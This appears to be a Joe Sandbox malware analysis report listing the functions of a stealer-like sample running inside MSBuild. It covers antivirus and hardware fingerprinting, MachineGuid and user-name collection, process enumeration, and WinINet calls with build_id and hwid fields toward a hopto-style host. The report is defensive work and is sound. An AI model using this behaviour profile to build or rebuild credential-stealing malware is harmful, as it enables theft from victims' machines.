String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 3060130021-315474579
Opcode ID: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
Instruction ID: a052c58cf411f7e98e6331d271807bd97e667b65bf600afed1fc3e3d3cff73f9
Opcode Fuzzy Hash: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
Instruction Fuzzy Hash: 90314F70A04245BBCB20DB91DC49EEFBF7CEFC9B10F20465AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043AAA4), ref: 004012D0
lstrcatA.KERNEL32(?,0043AAA8), ref: 004012DE
lstrcatA.KERNEL32(?,0043AAAC), ref: 004012EC
lstrcatA.KERNEL32(?,0043AAB0), ref: 004012FA
lstrcatA.KERNEL32(?,0043AAB4), ref: 00401308
lstrcatA.KERNEL32(?,0043AAB8), ref: 00401316
lstrcatA.KERNEL32(?,0043AABC), ref: 00401324
lstrcatA.KERNEL32(?,0043AAC0), ref: 00401332
lstrcatA.KERNEL32(?,0043AAC4), ref: 00401340
lstrcatA.KERNEL32(?,0043AAC8), ref: 0040134E
lstrcatA.KERNEL32(?,0043AACC), ref: 0040135C
lstrcatA.KERNEL32(?,0043AAD0), ref: 0040136A
lstrcatA.KERNEL32(?,0043AAD4), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
Instruction ID: 9778931569992fdfa2ae274a5f191432572d6dba79c88691fb85554d5ade8f97
Opcode Fuzzy Hash: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
Instruction Fuzzy Hash: 9A41A9B2D4422C57DB20EBB19C59FDB7BAC9F18310F5405A3E8D9E3181D67C9A84CB58

Function 00405F39 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 466
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

_memmove.LIBCMT ref: 00406639
_memmove.LIBCMT ref: 00406662
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2

Strings

------, xrefs: 004064C9
", xrefs: 00406445
", xrefs: 004065A1
------, xrefs: 00406080
build_id, xrefs: 00406419
", xrefs: 004062E5
------, xrefs: 00406367
af641acce3f8c85bf2490a9b3aa972c5, xrefs: 00406471
------, xrefs: 00406206
mode, xrefs: 00406575

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet_memmove$CrackFileRead
String ID: "$"$"$------$------$------$------$af641acce3f8c85bf2490a9b3aa972c5$build_id$mode
API String ID: 2247928238-1631910280
Opcode ID: 9130669875251964c831f1a88f491c766dae42b48f3d6367ba80e634a4db9760
Instruction ID: 761880eafc7f1130453e9609930188909abd0ac3e1dc834df3bf91bb01064538
Opcode Fuzzy Hash: 9130669875251964c831f1a88f491c766dae42b48f3d6367ba80e634a4db9760
Instruction Fuzzy Hash: 9E22C9719401699BCF21EB62CD46BCCB7B5AF04308F4144E7A60DB3151DAB56FCA8FA8

Function 00417151 Relevance: 16.8, APIs: 1, Strings: 8, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA

CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041771A

Part of subcall function 004139C2: strtok_s.MSVCRT ref: 004139F3

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Strings

.exe, xrefs: 00417F14
org, xrefs: 00417FF7
_DEBUG.zip, xrefs: 00418045
http://, xrefs: 00417F67
cowod., xrefs: 00417F8B
hopto, xrefs: 00417FAF
.exe, xrefs: 00417659
af641acce3f8c85bf2490a9b3aa972c5, xrefs: 0041781C

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s$CreateHeapProcess32$AllocDirectoryFirstH_prolog3_catch_NameNextProcessSnapshotToolhelp32User
String ID: .exe$.exe$_DEBUG.zip$af641acce3f8c85bf2490a9b3aa972c5$cowod.$hopto$http://$org
API String ID: 3631202960-1915720452
Opcode ID: a214d94b7480a8a3029ff1e86e675eec1ea475f145673b84de7e9ad73fc1cad7
Instruction ID: 4ceb97e4bc8bd76a369d1d2619bbd46815a38cac9c71142bc76181b4c2ec3f3b
Opcode Fuzzy Hash: a214d94b7480a8a3029ff1e86e675eec1ea475f145673b84de7e9ad73fc1cad7
Instruction Fuzzy Hash: AC9244315483419FC620FF26D94268EB7E1FF84308F51482FF58463191DBB8AA8D8B9B

Function 00404B2E Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 378
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C

Strings

------, xrefs: 00404F5B
------, xrefs: 00404C75
hwid, xrefs: 00404EAD
HxA, xrefs: 00405222
", xrefs: 00404ED9
", xrefs: 00405039
build_id, xrefs: 0040500D
------, xrefs: 00404DFB

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CrackFileRead
String ID: "$"$------$------$------$HxA$build_id$hwid
API String ID: 920491182-3648483202
Opcode ID: 3e75520d421d15d17480e17177354ca7258db6304e7740180cb8297fdc3c51f4
Instruction ID: 21305393b516d721eabc2380545c4b93fc8e403c2138cad973479bd5099e6fae
Opcode Fuzzy Hash: 3e75520d421d15d17480e17177354ca7258db6304e7740180cb8297fdc3c51f4
Instruction Fuzzy Hash: 0C02C371D5512A9ACF20EB21CD46ADDB7B5FF04308F4140E6A54873191DAB87ECA8FD8

Function 00411203 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 155
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

%s\%s, xrefs: 004112D7
- , xrefs: 004113E6
?, xrefs: 00411263

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenQueryValue$Enum
String ID: - $%s\%s$?
API String ID: 2712010499-3278919252
Opcode ID: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
Instruction ID: 4bdd8942e51cb3c4ef1bdab2b95b8e79246b76881c5f67d30fe8b157efa9521a
Opcode Fuzzy Hash: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
Instruction Fuzzy Hash: 8A61F7B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C
MachineGuid, xrefs: 00411640

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
Instruction ID: c9c539ce5467448423737f6d9a950d2a9d5193a79ae08df00dacda0898e1b174
Opcode Fuzzy Hash: 05f0a82242895fb301977400293e6bc20ca52c8c5dc3207f31c15ae16d7e7e80
Instruction Fuzzy Hash: 7B111EB590021DAFDB10DF90DC89FEAB7BDEB04309F5041E6A659E2052E6759F888F14

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043B018,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
Instruction ID: 0994ca530c552eb12484d48fed68a7c00db0df5c681817d2f603923d478d8980
Opcode Fuzzy Hash: c2f6d16d6af2cd9c2543edbdd70375dccd549122af3fd15938b7ee4cd554efb1
Instruction Fuzzy Hash: B1114C75A0420ADFCB019FA4CC989EEBBB5AF49310F64417EF215E73A0CB394945CB68

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004185DC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
Instruction ID: 46aed83c215a1155ddf1663667cd5ec87320cd9fa35168939231c0eb8388c106
Opcode Fuzzy Hash: a924c371d945ebb2b407fd39f7f412d7c5603bda08bc6eafd39d46e5dedd0ee5
Instruction Fuzzy Hash: 57F0C27278122077F22422763C6EFAB5A6C9B42F56F205035F309FB2D0D66998049ABC

Function 004109A2 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

Strings

:\, xrefs: 00410A06
C, xrefs: 004109DF
QuBi, xrefs: 00410A27
0xA, xrefs: 00410B21

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CurrentInformationProfileVolume_memsetmallocstrncpy
String ID: 0xA$:\$C$QuBi
API String ID: 1802918048-2474135401
Opcode ID: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
Instruction ID: a97db629e7901cba1803c5ad0a4512298f3feb58bff5cd952ebdd5184ea07982
Opcode Fuzzy Hash: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
Instruction Fuzzy Hash: A741AFB1A042289BCB249F749D85ADEBBB9EF19304F0000EAF109E3121E6758FD58F54

Function 0041BD34 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C), ref: 0041BD81
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CD01,?,0041CD8F,00000000,06400000,00000003,00000000), ref: 0041BDB9

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: 96129ee170b6e52e4a698042c6e04e57a17f8ea6b04b39fd16cd668f0541581b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: F23165B05047049FDB349F25D898BE77AE9EB14354F108B2FE296D2680D33898C4CB99

Function 00404AB6 Relevance: 6.0, APIs: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CrackInternet
String ID:
API String ID: 1381609488-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 0041257F Relevance: 6.0, APIs: 4, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CreateFirstH_prolog3_catch_NextSnapshotToolhelp32
String ID:
API String ID: 2623756784-0
Opcode ID: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
Instruction ID: a342571249a904de89e2d28a6ac51ba89f12813f8da7ed82e50d95a069ae9259
Opcode Fuzzy Hash: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
Instruction Fuzzy Hash: C1018135600224AFEB61DB609D48FEE77FE9F19301F8400E6E40DE2251EA798B849B35

Function 00411684 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CurrentProfile_memsetmallocstrncpy
String ID: Unknown
API String ID: 455225556-1654365787
Opcode ID: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
Instruction ID: cfd5adc8c7fec37571e4615a2d659ce623d81488d817e1095ce6785adf6647ed
Opcode Fuzzy Hash: 7ac010871cfdc6928f55026d9108d12a4a42d5102455bbea89dd41d9649856e6
Instruction Fuzzy Hash: 1A11B971A0011CABCB10EB65DC45FCD7378AB14704F0000A6B645E7191DAB89FC88F58

Function 00410B30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID: Windows 11
API String ID: 4153817207-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID: CurrentBuildNumber
API String ID: 4153817207-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 00410C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction ID: 4a48e0897f6a5e53a67cc5d7e0c14adbc6ce47083a4b6c26751418be0e4428b5
Opcode Fuzzy Hash: 223c93d772ac102104f3d80f3225d4df8625dfe3dc4c13cc38eb63403da552c2
Instruction Fuzzy Hash: 2DE08CB1200204BBD7449BD9AC8DF8A76BCDB84715F100226F605D6250EAB4C9848B68

Function 00416ED6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416EDD

Strings

ERROR, xrefs: 00416F64

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch
String ID: ERROR
API String ID: 3886170330-2861137601
Opcode ID: 338cbee65a1c59e49c180845701e6b8bd9124d1ad38e350ac5568e3f1653b496
Instruction ID: 206493d018c0af61ad3247b9a1edf73ec3ff293b71de332acb6c3f6d1aa8c941
Opcode Fuzzy Hash: 338cbee65a1c59e49c180845701e6b8bd9124d1ad38e350ac5568e3f1653b496
Instruction Fuzzy Hash: 5711B131900209AFCB40FF75D9026DCBBB1BF04308B80413AE814E3191D739EAA98FC9

Function 00411119 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: GlobalMemoryStatus
String ID: %d MB
API String ID: 1890195054-2651807785
Opcode ID: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
Instruction ID: d79e8d54b07d2f615201cd360c868d95b9dac01f4be2040cf9acff1c057e51b0
Opcode Fuzzy Hash: 17f18dc7cf53f9ebfacd37114c0aa46941e1124f845af7428171d2bc88ac11d2
Instruction Fuzzy Hash: F201A9B1E00218BBEB08DFB4DC45EEFB7B9EF08705F04006AF602D7290EA7599818758

Function 0041224A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID: =A
API String ID: 514040917-2399317284
Opcode ID: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
Instruction ID: ac01e61fcc3a8dc6a5e43971812eb7396920612e483317b6d6b91c956b259603
Opcode Fuzzy Hash: 72c40201efdd98e4edf8bbd3583afce16a5aafa9b07f53dd0fe7720fa140496e
Instruction Fuzzy Hash: 84F0B471600218ABDB24EB68DC45FEF77BC9B44B08F10006AF645D7180EEB5DAC58B54

Function 00416FA7 Relevance: 3.1, APIs: 2, Instructions: 70synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
Instruction ID: 6ddc57dea45eff21f3b413cd8a29bb57df9be50e409c6c2ee2748a51ac3a6ecc
Opcode Fuzzy Hash: 1c6142cbbd9849c9f35e06356520fbbbc19007ee5fb9fef6d8df9f607a11363d
Instruction Fuzzy Hash: E6217832900229ABCF10EF96EC419DE7BB9FF44358F10402BF904A3150D738AA86CFA4

Function 00410F51 Relevance: 3.0, APIs: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 0041CCCB Relevance: 2.5, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041CCDC

Part of subcall function 0041BC7F: lstrlenA.KERNEL32(?,0041CCED,0041CD8F,00000000,06400000,00000003,00000000,0041768F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BCB1
